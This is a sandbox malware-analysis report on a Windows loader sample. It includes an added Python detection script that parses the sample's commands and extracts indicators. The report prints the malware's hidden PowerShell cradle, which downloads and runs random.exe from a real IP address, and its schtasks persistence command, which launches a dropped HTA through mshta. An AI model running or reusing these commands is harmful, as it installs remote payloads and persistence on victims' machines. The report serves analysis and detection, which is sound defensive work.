File name: LIA_Intel_868e724925e76c170363a3a3d1a9f302f522389cdfac2a26651d3f1052e03828

Full analysis: https://app.any.run/tasks/40965836-4407-46f1-b219-093b95e37ce7
Verdict: Malicious activity
Threats:

A loader is malware whose job is to get onto a device and deliver further payloads. It typically profiles the infected system and then installs other threats such as trojans or stealers. Criminals usually distribute loaders through phishing emails and links, relying on social engineering to trick users into downloading and running the executable. Loaders use evasion and persistence techniques to stay undetected.

Analysis date: May 17, 2025, 01:18:29
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
auto-sch
loader
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32 executable (GUI) Intel 80386, for MS Windows, 5 sections
MD5: BFF537F368CF413F3D6D6D9481B1ED50
SHA1: 94E4CBE94FF75A61ECD488FDA24D3A912AF17C3D
SHA256: A3E7F1BA520DFBD12254F71AFF326E6B259DD00B8D147D60B08B4E93B43F8EB5
SSDEEP: 49152:ePPkzemqoSut3Jh4+QQ/btosJwIA4hHmZlKH2Tw/Pq83zw0bCjvk9G661QGtB7Xo:8P/mp7t3T4+B/btosJwIA4hHmZlKH2T/

ANY.RUN is an interactive service that gives the analyst full access to the guest system. Information in this report may be distorted by user actions and is provided as-is for the user's information. ANY.RUN does not guarantee the maliciousness or safety of the content.
  • MALICIOUS

    • Uses Task Scheduler to run other applications

      • cmd.exe (PID: 7392)
    • Run PowerShell with an invisible window

      • powershell.exe (PID: 7560)
      • powershell.exe (PID: 7796)
    • Script downloads file (POWERSHELL)

      • powershell.exe (PID: 7560)
      • powershell.exe (PID: 7796)
    • Request from PowerShell that ran from MSHTA.EXE

      • powershell.exe (PID: 7560)
      • powershell.exe (PID: 7796)
  • SUSPICIOUS

    • Found IP address in command line

      • powershell.exe (PID: 7560)
      • powershell.exe (PID: 7796)
    • Starts CMD.EXE for commands execution

      • LIA_Intel_868e724925e76c170363a3a3d1a9f302f522389cdfac2a26651d3f1052e03828.exe (PID: 7372)
    • Manipulates environment variables

      • powershell.exe (PID: 7560)
      • powershell.exe (PID: 7796)
    • Starts process via Powershell

      • powershell.exe (PID: 7560)
      • powershell.exe (PID: 7796)
    • Starts POWERSHELL.EXE for commands execution

      • mshta.exe (PID: 7416)
      • mshta.exe (PID: 7724)
    • Probably download files using WebClient

      • mshta.exe (PID: 7416)
      • mshta.exe (PID: 7724)
    • Connects to the server without a host name

      • powershell.exe (PID: 7560)
      • powershell.exe (PID: 7796)
    • Process requests binary or script from the Internet

      • powershell.exe (PID: 7560)
      • powershell.exe (PID: 7796)
  • INFO

    • The sample compiled with english language support

      • LIA_Intel_868e724925e76c170363a3a3d1a9f302f522389cdfac2a26651d3f1052e03828.exe (PID: 7372)
    • Reads mouse settings

      • LIA_Intel_868e724925e76c170363a3a3d1a9f302f522389cdfac2a26651d3f1052e03828.exe (PID: 7372)
    • Checks supported languages

      • LIA_Intel_868e724925e76c170363a3a3d1a9f302f522389cdfac2a26651d3f1052e03828.exe (PID: 7372)
    • Create files in a temporary directory

      • LIA_Intel_868e724925e76c170363a3a3d1a9f302f522389cdfac2a26651d3f1052e03828.exe (PID: 7372)
    • Reads the computer name

      • LIA_Intel_868e724925e76c170363a3a3d1a9f302f522389cdfac2a26651d3f1052e03828.exe (PID: 7372)
    • Auto-launch of the file from Task Scheduler

      • cmd.exe (PID: 7392)
    • Reads Internet Explorer settings

      • mshta.exe (PID: 7416)
      • mshta.exe (PID: 7724)
    • Manual execution by a user

      • mshta.exe (PID: 7724)
    • Disables trace logs

      • powershell.exe (PID: 7560)
      • powershell.exe (PID: 7796)
    • Checks proxy server information

      • powershell.exe (PID: 7560)
      • slui.exe (PID: 8180)
      • powershell.exe (PID: 7796)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 7560)
      • powershell.exe (PID: 7796)
    • Reads the software policy settings

      • slui.exe (PID: 8180)
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (76.4)
.exe | Win32 Executable (generic) (12.4)
.exe | Generic Win/DOS Executable (5.5)
.exe | DOS Executable Generic (5.5)

EXIF

EXE

MachineType: Intel 386 or later, and compatibles
TimeStamp: 2025:05:16 14:39:34+00:00
ImageFileCharacteristics: Executable, Large address aware, 32-bit
PEType: PE32
LinkerVersion: 14.16
CodeSize: 633856
InitializedDataSize: 326144
UninitializedDataSize: -
EntryPoint: 0x20577
OSVersion: 5.1
ImageVersion: -
SubsystemVersion: 5.1
Subsystem: Windows GUI
FileVersionNumber: 0.0.0.0
ProductVersionNumber: 0.0.0.0
FileFlagsMask: 0x0000
FileFlags: (none)
FileOS: Win32
ObjectFileType: Executable application
FileSubtype: -
LanguageCode: English (British)
CharacterSet: Unicode
Total processes
129
Monitored processes
11
Malicious processes
5
Suspicious processes
0

Behavior graph (interactive in the full report)

Processes in the graph: lia_intel_868e724925e76c170363a3a3d1a9f302f522389cdfac2a26651d3f1052e03828.exe, cmd.exe, conhost.exe, mshta.exe, schtasks.exe, powershell.exe, conhost.exe, mshta.exe, powershell.exe, conhost.exe, slui.exe

Process information

PID: 7372
CMD: "C:\Users\admin\Desktop\LIA_Intel_868e724925e76c170363a3a3d1a9f302f522389cdfac2a26651d3f1052e03828.exe"
Path: C:\Users\admin\Desktop\LIA_Intel_868e724925e76c170363a3a3d1a9f302f522389cdfac2a26651d3f1052e03828.exe
Parent process: explorer.exe
User:
admin
Integrity Level:
MEDIUM
Exit code:
0
Modules
Images
c:\users\admin\desktop\lia_intel_868e724925e76c170363a3a3d1a9f302f522389cdfac2a26651d3f1052e03828.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\psapi.dll
PID: 7392
CMD: C:\WINDOWS\system32\cmd.exe /c schtasks /create /tn nTkyYmaq4Wc /tr "mshta C:\Users\admin\AppData\Local\Temp\UiQ2W3mTV.hta" /sc minute /mo 25 /ru "admin" /f
Path: C:\Windows\SysWOW64\cmd.exe
Parent process: LIA_Intel_868e724925e76c170363a3a3d1a9f302f522389cdfac2a26651d3f1052e03828.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.3636 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
PID: 7400
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 7416
CMD: mshta C:\Users\admin\AppData\Local\Temp\UiQ2W3mTV.hta
Path: C:\Windows\SysWOW64\mshta.exe
Parent process: LIA_Intel_868e724925e76c170363a3a3d1a9f302f522389cdfac2a26651d3f1052e03828.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
PID: 7476
CMD: schtasks /create /tn nTkyYmaq4Wc /tr "mshta C:\Users\admin\AppData\Local\Temp\UiQ2W3mTV.hta" /sc minute /mo 25 /ru "admin" /f
Path: C:\Windows\SysWOW64\schtasks.exe
Parent process: cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Task Scheduler Configuration Tool
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\msvcrt.dll
PID: 7560
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'R7HAXQFMLPAMGHCCHOWLPMNKRXKTRIYH.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.156.72.2/testmine/random.exe',$d);Start-Process $d;
Path: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Parent process: mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
PID: 7568
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 7724
CMD: mshta C:\Users\admin\AppData\Local\Temp\UiQ2W3mTV.hta
Path: C:\Windows\System32\mshta.exe
Parent process: explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft (R) HTML Application host
Exit code:
0
Version:
11.00.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\mshta.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\wldp.dll
PID: 7796
CMD: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'R7HAXQFMLPAMGHCCHOWLPMNKRXKTRIYH.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.156.72.2/testmine/random.exe',$d);Start-Process $d;
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Parent process: mshta.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 7804
CMD: \??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1
Path: C:\Windows\System32\conhost.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
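The two command lines a detection engineer would key on in this chain are the schtasks persistence line (PID 7476, run via cmd.exe 7392) and the PowerShell download cradle that mshta.exe spawns (PIDs 7560 and 7796). The following is an added example, not code from the ANY.RUN report or from the sample: it parses both command lines, resolves where the download would land, extracts IOCs, and scores a constructed set of process-creation events mirroring the chain above. The event records, the finding names and TEMP_DIR (taken from the dropped-file paths in the report) are assumptions of the example. One detail it surfaces: `$env:temp` has no trailing backslash and the cradle concatenates the file name directly, so, if the sandbox reproduced the argument faithfully, the payload would be written to `C:\Users\admin\AppData\Local\TempR7HAXQFMLPAMGHCCHOWLPMNKRXKTRIYH.EXE`, beside the Temp directory rather than inside it. Both PowerShell processes exited with code 1, the report flags "Script raised an exception", and the HTTP rows below carry no response code, which is consistent with the download not completing during analysis; treat `random.exe` as unretrieved rather than benign.

```python
"""Added example: parse the schtasks persistence line and the PowerShell download
cradle from the report above and flag the process chain. Not ANY.RUN code; the
events at the bottom are constructed from the report's command lines."""
import re
from urllib.parse import urlparse

# Assumption: %TEMP% of the sandbox user, taken from the dropped-file paths in the report.
TEMP_DIR = r"C:\Users\admin\AppData\Local\Temp"

# Interpreters/LOLBins that are rarely a legitimate action of a user-created task.
LOLBIN_ACTIONS = {"mshta", "powershell", "wscript", "cscript", "rundll32", "regsvr32", "certutil"}

SCHTASKS_CREATE = re.compile(r"schtasks(?:\.exe)?\s+/create", re.I)
TASK_FIELD = {
    "task_name": re.compile(r"/tn\s+(\S+)", re.I),
    "action": re.compile(r'/tr\s+"([^"]*)"', re.I),
    "schedule": re.compile(r"/sc\s+(\w+)", re.I),
    "modifier": re.compile(r"/mo\s+(\d+)", re.I),
    "run_as": re.compile(r'/ru\s+"?([^"\s]+)"?', re.I),
}
DOWNLOAD_FILE = re.compile(r"DownloadFile\(\s*'([^']+)'\s*,\s*(\$\w+)\s*\)", re.I)
TEMP_CONCAT = re.compile(r"(\$\w+)\s*=\s*\$env:temp\s*\+\s*'([^']+)'", re.I)
DOTTED_QUAD = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")


def _first(rx, text):
    m = rx.search(text)
    return m.group(1) if m else None


def parse_schtasks(cmdline):
    """Fields of a `schtasks /create` command line, or None if it is not one."""
    if not SCHTASKS_CREATE.search(cmdline):
        return None
    fields = {k: _first(rx, cmdline) for k, rx in TASK_FIELD.items()}
    fields["action"] = fields["action"] or ""
    fields["schedule"] = (fields["schedule"] or "").lower()
    fields["modifier"] = int(fields["modifier"] or 0)
    fields["force"] = bool(re.search(r"\s/f(?:\s|$)", cmdline, re.I))
    # First token of the action, stripped of directory and ".exe", e.g. "mshta".
    binary = fields["action"].split(" ", 1)[0].rsplit("\\", 1)[-1].lower()
    binary = binary[:-4] if binary.endswith(".exe") else binary
    fields["lolbin_action"] = binary in LOLBIN_ACTIONS
    return fields


def parse_download_cradle(cmdline):
    """Fields of a WebClient.DownloadFile cradle, or None if the line has none."""
    m = DOWNLOAD_FILE.search(cmdline)
    if not m:
        return None
    url, dest_var = m.group(1), m.group(2)
    host = urlparse(url).hostname or ""
    dest_path = None
    m_dest = TEMP_CONCAT.search(cmdline)
    if m_dest and m_dest.group(1) == dest_var:
        # PowerShell '+' is plain string concatenation and $env:temp has no trailing
        # backslash, so a literal without a leading '\' lands beside %TEMP%, not inside it.
        dest_path = TEMP_DIR + m_dest.group(2)
    return {
        "hidden_window": bool(re.search(r"-WindowStyle\s+Hidden", cmdline, re.I)),
        "url": url,
        "host": host,
        "host_is_ip": DOTTED_QUAD.fullmatch(host) is not None,
        "dest_path": dest_path,
        "executes_download": bool(re.search(r"Start-Process\s+" + re.escape(dest_var), cmdline, re.I)),
    }


def score_event(event):
    """Names of the suspicious traits found in one process-creation event."""
    findings = []
    task = parse_schtasks(event["cmdline"])
    if task:
        if task["lolbin_action"]:
            findings.append("scheduled_task_runs_lolbin")
        if task["schedule"] == "minute":
            findings.append("high_frequency_task")
        if "\\temp\\" in task["action"].lower():
            findings.append("task_action_in_temp")
    cradle = parse_download_cradle(event["cmdline"])
    if cradle:
        if cradle["hidden_window"]:
            findings.append("hidden_powershell_window")
        if cradle["host_is_ip"]:
            findings.append("download_from_dotted_quad")
        if cradle["executes_download"]:
            findings.append("download_then_execute")
        if event["parent"].lower() == "mshta.exe":
            findings.append("mshta_spawned_powershell")
    return findings


def detect_chain(events):
    """Map pid -> findings for every event that triggered at least one finding."""
    result = {}
    for ev in events:
        findings = score_event(ev)
        if findings:
            result[ev["pid"]] = findings
    return result


def extract_iocs(events):
    """Task names, URLs, hosts and on-disk paths worth blocking or hunting for."""
    iocs = {"task_names": set(), "urls": set(), "hosts": set(), "paths": set()}
    for ev in events:
        task = parse_schtasks(ev["cmdline"])
        if task:
            iocs["task_names"].add(task["task_name"])
            iocs["paths"].update(re.findall(r"[A-Za-z]:\\[^\"\s]+", task["action"]))
        cradle = parse_download_cradle(ev["cmdline"])
        if cradle:
            iocs["urls"].add(cradle["url"])
            iocs["hosts"].add(cradle["host"])
            if cradle["dest_path"]:
                iocs["paths"].add(cradle["dest_path"])
    return iocs


# Constructed process-creation events, built from the command lines in the report.
SAMPLE = "LIA_Intel_868e724925e76c170363a3a3d1a9f302f522389cdfac2a26651d3f1052e03828.exe"
SCHTASKS_CMD = r'schtasks /create /tn nTkyYmaq4Wc /tr "mshta C:\Users\admin\AppData\Local\Temp\UiQ2W3mTV.hta" /sc minute /mo 25 /ru "admin" /f'
CRADLE_CMD = (r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden '
              r"$d=$env:temp+'R7HAXQFMLPAMGHCCHOWLPMNKRXKTRIYH.EXE';"
              r"(New-Object System.Net.WebClient).DownloadFile('http://185.156.72.2/testmine/random.exe',$d);"
              r"Start-Process $d;")
EVENTS = [
    {"pid": 7372, "image": SAMPLE, "parent": "explorer.exe", "cmdline": "\"C:\\Users\\admin\\Desktop\\" + SAMPLE + "\""},
    {"pid": 7392, "image": "cmd.exe", "parent": SAMPLE, "cmdline": r"C:\WINDOWS\system32\cmd.exe /c " + SCHTASKS_CMD},
    {"pid": 7476, "image": "schtasks.exe", "parent": "cmd.exe", "cmdline": SCHTASKS_CMD},
    {"pid": 7416, "image": "mshta.exe", "parent": SAMPLE, "cmdline": r"mshta C:\Users\admin\AppData\Local\Temp\UiQ2W3mTV.hta"},
    {"pid": 7560, "image": "powershell.exe", "parent": "mshta.exe", "cmdline": CRADLE_CMD},
]

if __name__ == "__main__":
    for pid, findings in detect_chain(EVENTS).items():
        print(pid, ", ".join(findings))
    for kind, values in extract_iocs(EVENTS).items():
        print(kind, sorted(values))
```

The scoring is deliberately per-event so each rule maps to one process-creation record as an EDR or Sysmon event ID 1 would deliver it; the parent check on the cradle is what turns a generic "PowerShell downloads from an IP" hit into the mshta-to-powershell chain this report shows. To hunt the persistence on a live host, look for a scheduled task whose action starts with mshta and points into a user's Temp directory, which is what `task_action_in_temp` plus `scheduled_task_runs_lolbin` encode here.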
Total events
13 733
Read events
13 713
Write events
20
Delete events
0

Modification events

Process: (7416) mshta.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation: write
Name: CachePrefix
Value:

Process: (7416) mshta.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation: write
Name: CachePrefix
Value: Cookie:

Process: (7416) mshta.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation: write
Name: CachePrefix
Value: Visited:

Process: (7724) mshta.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content
Operation: write
Name: CachePrefix
Value:

Process: (7724) mshta.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies
Operation: write
Name: CachePrefix
Value: Cookie:

Process: (7724) mshta.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History
Operation: write
Name: CachePrefix
Value: Visited:

Process: (7560) powershell.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation: write
Name: EnableFileTracing
Value: 0

Process: (7560) powershell.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation: write
Name: EnableAutoFileTracing
Value: 0

Process: (7560) powershell.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation: write
Name: EnableConsoleTracing
Value: 0

Process: (7560) powershell.exe
Key: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\powershell_RASAPI32
Operation: write
Name: FileTracingMask
Value:
Executable files: 0
Suspicious files: 1
Text files: 5
Unknown types: 0

Dropped files

PID: 7372
Process: LIA_Intel_868e724925e76c170363a3a3d1a9f302f522389cdfac2a26651d3f1052e03828.exe
Filename: C:\Users\admin\AppData\Local\Temp\UiQ2W3mTV.hta
Type: html
MD5: AAA3AB1A36F7B5CC74BE535A6431DCA8
SHA256: AA57F85EFA407426DA8485055B33051D1D7A940DBB3F4CDF92C4AC2FE077C4EB

PID: 7560
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_w0tcd0uq.rgx.psm1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 7560
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Type: binary
MD5: 28814BB08523A9F7C669B65F75F567FE
SHA256: BCE88EBE00BCCCE03BC595F7BB9B44E9001D94AEA2B97C8E3E16BE52C4BFFA76

PID: 7796
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_dvdjeqky.r4j.ps1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 7796
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_kdieybj0.ajx.psm1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7

PID: 7560
Process: powershell.exe
Filename: C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_wzqovyhm.0yu.ps1
Type: text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
26
DNS requests
3
Threats
5

HTTP requests

PID   Process         Method  HTTP Code  IP               URL                                      CN       Type  Size  Reputation
7560  powershell.exe  GET     -          185.156.72.2:80  http://185.156.72.2/testmine/random.exe  unknown  -     -     unknown
7560  powershell.exe  GET     -          185.156.72.2:80  http://185.156.72.2/testmine/random.exe  unknown  -     -     unknown
7796  powershell.exe  GET     -          185.156.72.2:80  http://185.156.72.2/testmine/random.exe  unknown  -     -     unknown
7796  powershell.exe  GET     -          185.156.72.2:80  http://185.156.72.2/testmine/random.exe  unknown  -     -     unknown

(No HTTP response code, content type or size is recorded for any of the four requests.)

Connections

PID   Process         IP                   Domain                           ASN                          CN  Reputation
4     System          192.168.100.255:138  -                                -                            -   whitelisted
-     -               40.127.240.158:443   settings-win.data.microsoft.com  MICROSOFT-CORP-MSN-AS-BLOCK  IE  whitelisted
7560  powershell.exe  185.156.72.2:80      -                                Tov Vaiz Partner             RU  unknown
7796  powershell.exe  185.156.72.2:80      -                                Tov Vaiz Partner             RU  unknown
4     System          192.168.100.255:137  -                                -                            -   whitelisted
7252  slui.exe        40.91.76.224:443     activation-v2.sls.microsoft.com  MICROSOFT-CORP-MSN-AS-BLOCK  US  whitelisted
8180  slui.exe        40.91.76.224:443     activation-v2.sls.microsoft.com  MICROSOFT-CORP-MSN-AS-BLOCK  US  whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
whitelisted
google.com
  • 142.250.185.174
whitelisted
activation-v2.sls.microsoft.com
  • 40.91.76.224
whitelisted

Threats

PID   Process         Class                    Message
7560  powershell.exe  Misc Attack              ET DROP Spamhaus DROP Listed Traffic Inbound group 34
7560  powershell.exe  Potentially Bad Traffic  ET INFO Executable Download from dotted-quad Host
7796  powershell.exe  Potentially Bad Traffic  ET INFO Executable Download from dotted-quad Host
7560  powershell.exe  Potentially Bad Traffic  ET INFO Executable Download from dotted-quad Host
7796  powershell.exe  Potentially Bad Traffic  ET INFO Executable Download from dotted-quad Host
No debug info